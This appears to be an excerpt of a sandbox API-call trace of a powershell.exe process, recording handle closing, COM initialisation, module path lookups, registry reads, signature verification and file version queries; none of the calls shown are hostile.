[0287.324] CloseHandle (hObject=0x984) returned 1 [0287.325] CloseHandle (hObject=0x974) returned 1 [0287.325] CloseHandle (hObject=0x978) returned 1 [0287.325] CloseHandle (hObject=0x97c) returned 1 [0287.325] CloseHandle (hObject=0xa38) returned 1 [0287.325] CloseHandle (hObject=0xa34) returned 1 [0287.326] CloseHandle (hObject=0xa30) returned 1 [0287.326] CloseHandle (hObject=0xa2c) returned 1 [0287.326] CloseHandle (hObject=0x8ec) returned 1 [0287.326] CloseHandle (hObject=0x8e8) returned 1 [0287.326] CloseHandle (hObject=0x8e4) returned 1 [0287.326] CloseHandle (hObject=0x8e0) returned 1 [0287.327] CloseHandle (hObject=0x8dc) returned 1 [0287.327] CloseHandle (hObject=0x8d8) returned 1 [0287.327] CloseHandle (hObject=0x8d4) returned 1 [0287.327] CloseHandle (hObject=0x8d0) returned 1 [0287.327] CloseHandle (hObject=0x8cc) returned 1 [0287.328] CloseHandle (hObject=0x8c8) returned 1 [0287.328] CloseHandle (hObject=0x8c0) returned 1 [0287.328] CloseHandle (hObject=0x8c4) returned 1 [0287.328] CloseHandle (hObject=0x8b8) returned 1 [0287.333] CloseHandle (hObject=0x8bc) returned 1 [0287.333] CloseHandle (hObject=0xa24) returned 1 [0287.333] CloseHandle (hObject=0xa28) returned 1 [0287.333] CloseHandle (hObject=0xa1c) returned 1 [0287.334] CloseHandle (hObject=0xa20) returned 1 [0287.334] CloseHandle (hObject=0xa50) returned 1 [0287.334] CloseHandle (hObject=0xa4c) returned 1 [0287.334] CloseHandle (hObject=0xa18) returned 1 [0287.334] CloseHandle (hObject=0xa14) returned 1 [0287.335] CloseHandle (hObject=0x9e0) returned 1 [0287.335] CloseHandle (hObject=0x9dc) returned 1 [0287.335] CloseHandle (hObject=0x9d8) returned 1 [0287.335] CloseHandle (hObject=0x9d4) returned 1 [0287.335] CloseHandle (hObject=0x970) returned 1 [0287.336] CloseHandle (hObject=0x968) returned 1 [0287.336] CloseHandle (hObject=0x8b0) returned 1 [0287.336] CloseHandle (hObject=0x8ac) returned 1 [0287.336] CloseHandle (hObject=0x8a8) returned 1 [0287.336] CloseHandle (hObject=0x8a4) returned 1 [0287.337] CloseHandle (hObject=0x8a0) returned 1 [0287.337] CloseHandle (hObject=0x89c) returned 1 [0287.337] CloseHandle (hObject=0x898) returned 1 [0287.337] CloseHandle (hObject=0x894) returned 1 [0287.337] CloseHandle (hObject=0x890) returned 1 [0287.338] CloseHandle (hObject=0x880) returned 1 [0287.338] CloseHandle (hObject=0x884) returned 1 [0287.338] CloseHandle (hObject=0x750) returned 1 [0287.338] CloseHandle (hObject=0x878) returned 1 [0287.338] CloseHandle (hObject=0x87c) returned 1 [0287.339] CloseHandle (hObject=0x80c) returned 1 [0287.339] CloseHandle (hObject=0x808) returned 1 [0287.339] CloseHandle (hObject=0x7ec) returned 1 [0287.339] CloseHandle (hObject=0x7f0) returned 1 [0287.339] CloseHandle (hObject=0x7f4) returned 1 [0287.340] CloseHandle (hObject=0x7f8) returned 1 [0287.340] CloseHandle (hObject=0x7fc) returned 1 [0287.340] CloseHandle (hObject=0x804) returned 1 [0287.340] CloseHandle (hObject=0x410) returned 1 [0287.340] CloseHandle (hObject=0x40c) returned 1 [0287.340] CloseHandle (hObject=0x960) returned 1 [0287.341] CloseHandle (hObject=0x964) returned 1 [0287.341] CloseHandle (hObject=0x9d0) returned 1 [0287.341] CloseHandle (hObject=0x9cc) returned 1 [0287.341] CloseHandle (hObject=0x9c8) returned 1 [0287.341] CloseHandle (hObject=0x9c4) returned 1 [0287.342] RegCloseKey (hKey=0x848) returned 0x0 [0287.342] CloseHandle (hObject=0x844) returned 1 [0287.342] CloseHandle (hObject=0x840) returned 1 [0287.342] CloseHandle (hObject=0x83c) returned 1 [0287.343] CloseHandle (hObject=0x838) returned 1 [0287.343] CloseHandle (hObject=0x834) returned 1 [0287.343] CloseHandle (hObject=0x830) returned 1 [0287.343] CloseHandle (hObject=0x82c) returned 1 [0287.343] CloseHandle (hObject=0x828) returned 1 [0287.344] CloseHandle (hObject=0x824) returned 1 [0287.344] CloseHandle (hObject=0x820) returned 1 [0287.346] CloseHandle (hObject=0x81c) returned 1 [0287.346] CloseHandle (hObject=0x818) returned 1 [0287.346] CloseHandle (hObject=0x814) returned 1 [0287.346] CloseHandle (hObject=0x60c) returned 1 [0287.347] CloseHandle (hObject=0x9c0) returned 1 [0287.347] CloseHandle (hObject=0x9bc) returned 1 [0287.347] CloseHandle (hObject=0x9b4) returned 1 [0287.347] CloseHandle (hObject=0x9b8) returned 1 [0287.347] CloseHandle (hObject=0x9ac) returned 1 [0287.348] CloseHandle (hObject=0x9b0) returned 1 [0287.348] CloseHandle (hObject=0xa10) returned 1 [0287.348] CloseHandle (hObject=0xa0c) returned 1 [0287.348] CloseHandle (hObject=0xa08) returned 1 Thread: id = 61 os_tid = 0x102c Thread: id = 62 os_tid = 0x12a4 Thread: id = 63 os_tid = 0x107c Thread: id = 64 os_tid = 0xdcc [0239.536] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0239.537] CoGetContextToken (in: pToken=0x6a6fc44 | out: pToken=0x6a6fc44) returned 0x0 [0239.537] CObjectContext::QueryInterface () returned 0x0 [0239.537] CObjectContext::GetCurrentThreadType () returned 0x0 [0239.537] Release () returned 0x0 [0239.537] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0239.538] CoUninitialize () [0239.538] RoInitialize () returned 0x1 [0239.538] RoUninitialize () returned 0x0 [0239.642] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x104, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0239.642] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0239.642] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0239.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a6efe0) returned 1 [0239.642] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x6a6f05c | out: lpFileInformation=0x6a6f05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ce8766, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x71ce8766, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x71d0e9d1, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x623400)) returned 1 [0239.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a6efdc) returned 1 [0239.643] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x6a6f0d0 | out: lpdwHandle=0x6a6f0d0) returned 0x94c [0239.644] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x493dd30 | out: lpData=0x493dd30) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x6a6f0a4, puLen=0x6a6f0a0 | out: lplpBuffer=0x6a6f0a4*=0x493ddcc, puLen=0x6a6f0a0) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493dea8, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493defc, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493df58, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493df98, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493e000, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493e09c, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493e100, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493e17c, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x493de24, puLen=0x6a6f020) returned 1 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x0, puLen=0x6a6f020) returned 0 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x0, puLen=0x6a6f020) returned 0 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x6a6f024, puLen=0x6a6f020 | out: lplpBuffer=0x6a6f024*=0x0, puLen=0x6a6f020) returned 0 [0239.645] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x6a6f018, puLen=0x6a6f014 | out: lplpBuffer=0x6a6f018*=0x493ddcc, puLen=0x6a6f014) returned 1 [0239.645] VerLanguageNameW (in: wLang=0x0, szLang=0x6a6eda8, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0239.646] VerQueryValueW (in: pBlock=0x493dd30, lpSubBlock="\\", lplpBuffer=0x6a6f028, puLen=0x6a6f024 | out: lplpBuffer=0x6a6f028*=0x493dd58, puLen=0x6a6f024) returned 1 [0239.651] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f068 | out: phkResult=0x6a6f068*=0x360) returned 0x0 [0239.652] RegQueryValueExW (in: hKey=0x360, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x6a6f088, lpData=0x0, lpcbData=0x6a6f084*=0x0 | out: lpType=0x6a6f088*=0x1, lpData=0x0, lpcbData=0x6a6f084*=0x8) returned 0x0 [0239.652] RegQueryValueExW (in: hKey=0x360, lpValueName="ServiceStackVersion", lpReserved=0x0, lpType=0x6a6f088, lpData=0x493fde8, lpcbData=0x6a6f084*=0x8 | out: lpType=0x6a6f088*=0x1, lpData="3.0", lpcbData=0x6a6f084*=0x8) returned 0x0 [0239.653] RegCloseKey (hKey=0x360) returned 0x0 [0239.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f788 | out: phkResult=0x6a6f788*=0x360) returned 0x0 [0239.654] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6a6f7a8, lpData=0x0, lpcbData=0x6a6f7a4*=0x0 | out: lpType=0x6a6f7a8*=0x1, lpData=0x0, lpcbData=0x6a6f7a4*=0x56) returned 0x0 [0239.654] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6a6f7a8, lpData=0x49400d8, lpcbData=0x6a6f7a4*=0x56 | out: lpType=0x6a6f7a8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6a6f7a4*=0x56) returned 0x0 [0239.655] RegCloseKey (hKey=0x360) returned 0x0 [0239.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0239.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0239.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a6f744) returned 1 [0239.656] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x6a6f7c0 | out: lpFileInformation=0x6a6f7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0239.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a6f740) returned 1 [0239.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0239.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0239.697] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f750 | out: phkResult=0x6a6f750*=0x360) returned 0x0 [0239.698] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6a6f770, lpData=0x0, lpcbData=0x6a6f76c*=0x0 | out: lpType=0x6a6f770*=0x1, lpData=0x0, lpcbData=0x6a6f76c*=0x56) returned 0x0 [0239.699] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6a6f770, lpData=0x4966228, lpcbData=0x6a6f76c*=0x56 | out: lpType=0x6a6f770*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6a6f76c*=0x56) returned 0x0 [0239.699] RegCloseKey (hKey=0x360) returned 0x0 [0239.793] CoTaskMemAlloc (cb=0x20c) returned 0x87a608 [0239.793] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x87a608 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0239.797] CoTaskMemFree (pv=0x87a608) [0239.797] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0239.797] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0239.798] CoTaskMemAlloc (cb=0x20c) returned 0x87a608 [0239.798] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x87a608 | out: pszPath="C:\\WINDOWS\\SysWOW64") returned 0x0 [0239.799] CoTaskMemFree (pv=0x87a608) [0239.799] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0239.799] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64", lpFilePart=0x0) returned 0x13 [0239.799] CoTaskMemAlloc (cb=0x20c) returned 0x87a608 [0239.799] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x87a608 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0239.802] CoTaskMemFree (pv=0x87a608) [0239.802] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0239.802] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0239.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0239.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0239.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a6f6b8) returned 1 [0239.848] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x6a6f734 | out: lpFileInformation=0x6a6f734*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0239.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a6f6b4) returned 1 [0239.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0239.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0239.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a6f68c) returned 1 [0239.851] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3e8 [0239.851] GetFileType (hFile=0x3e8) returned 0x1 [0239.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a6f688) returned 1 [0239.851] GetFileType (hFile=0x3e8) returned 0x1 [0239.868] WTGetSignatureInfo () returned 0x0 [0240.691] CertDuplicateCertificateContext (pCertContext=0x8ebca8) returned 0x8ebca8 [0240.781] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f6f0 | out: phkResult=0x6a6f6f0*=0x608) returned 0x0 [0240.782] RegQueryValueExW (in: hKey=0x608, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6a6f710, lpData=0x0, lpcbData=0x6a6f70c*=0x0 | out: lpType=0x6a6f710*=0x1, lpData=0x0, lpcbData=0x6a6f70c*=0x56) returned 0x0 [0240.782] RegQueryValueExW (in: hKey=0x608, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6a6f710, lpData=0x49890b8, lpcbData=0x6a6f70c*=0x56 | out: lpType=0x6a6f710*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6a6f70c*=0x56) returned 0x0 [0240.782] RegCloseKey (hKey=0x608) returned 0x0 [0240.782] CoTaskMemAlloc (cb=0x10) returned 0x880298 [0240.783] CoTaskMemAlloc (cb=0x30) returned 0x6db4390 [0240.821] WinVerifyTrust () returned 0x0 [0240.824] CoTaskMemFree (pv=0x6db4390) [0240.824] CoTaskMemFree (pv=0x880298) [0240.824] CertFreeCertificateContext (pCertContext=0x8ebca8) returned 1 [0240.825] CloseHandle (hObject=0x3e8) returned 1 [0240.828] GetCurrentProcessId () returned 0x13b8 [0240.828] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13b8) returned 0x3e8 [0240.829] EnumProcessModules (in: hProcess=0x3e8, lphModule=0x498a4ec, cb=0x100, lpcbNeeded=0x6a6f75c | out: lphModule=0x498a4ec, lpcbNeeded=0x6a6f75c) returned 1 [0240.829] GetModuleInformation (in: hProcess=0x3e8, hModule=0x1020000, lpmodinfo=0x498a62c, cb=0xc | out: lpmodinfo=0x498a62c*(lpBaseOfDll=0x1020000, SizeOfImage=0x6c000, EntryPoint=0x10295f0)) returned 1 [0240.829] CoTaskMemAlloc (cb=0x804) returned 0x6db74c0 [0240.829] GetModuleBaseNameW (in: hProcess=0x3e8, hModule=0x1020000, lpBaseName=0x6db74c0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0240.829] CoTaskMemFree (pv=0x6db74c0) [0240.829] CoTaskMemAlloc (cb=0x804) returned 0x6db74c0 [0240.829] GetModuleFileNameExW (in: hProcess=0x3e8, hModule=0x1020000, lpFilename=0x6db74c0, nSize=0x800 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0240.829] CoTaskMemFree (pv=0x6db74c0) [0240.829] CloseHandle (hObject=0x3e8) returned 1 [0240.830] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0240.830] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0240.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a6f6dc) returned 1 [0240.830] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x6a6f758 | out: lpFileInformation=0x6a6f758*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fdc1d0a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fdc1d0a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fdc1d0a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0240.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a6f6d8) returned 1 [0240.830] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x6a6f7cc | out: lpdwHandle=0x6a6f7cc) returned 0x72c [0240.830] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x72c, lpData=0x498c804 | out: lpData=0x498c804) returned 1 [0240.830] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x6a6f7a0, puLen=0x6a6f79c | out: lplpBuffer=0x6a6f7a0*=0x498cb94, puLen=0x6a6f79c) returned 1 [0240.830] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x498c8bc, puLen=0x6a6f71c) returned 1 [0240.831] VerQueryValueW (in: pBlock=0x498c804, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x6a6f720, puLen=0x6a6f71c | out: lplpBuffer=0x6a6f720*=0x498c910, puLen=0x6a6f71c) returned 1 